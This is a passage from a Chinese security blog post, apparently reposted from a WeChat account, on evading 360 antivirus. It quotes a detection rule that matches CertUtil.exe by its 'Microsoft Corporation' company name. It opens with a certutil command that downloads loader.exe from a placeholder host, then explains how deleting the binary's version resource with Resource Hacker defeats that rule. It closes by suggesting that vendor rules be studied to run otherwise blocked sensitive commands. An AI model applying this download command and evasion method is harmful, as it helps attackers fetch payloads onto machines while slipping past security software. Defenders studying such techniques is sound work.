certutil -urlcache -split -f http://xxxxx/loader.exe
|IN=CertUtil.exe|CN@=Microsoft Corporation|LOLBin=none|
IN=InternalName(内部名)CN=公司名LOLBin=白利用拦截
规则的含义中CertUtil.exe名字我们可以随意更改,LOLBin=none可以忽略,关键点就在于Microsoft Corporation中。Microsoft Corporation存在资源文件中,那我们是不是更改或者删除相关资源文件即可绕过。
把CertUtil.exe使用Resource_Hacker打开,删除版本信息。
删除后保存为新的CertUtil.exe,在杀软环境下使用certutil下载文件的常见命令
从上图实验来看,删除了Microsoft Corporation资源,杀软的规则就对比不上,我们成功绕过其检测。
在某些情况下,我们是否可以根据其规则,来绕过该杀软去执行本来无法执行的相关敏感命令呢?针对性绕过。
本文首发先知社区:https://xz.aliyun.com/news/15309
原文始发于微信公众号(安全天书):【免杀思路】被360殴打的那些日子
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论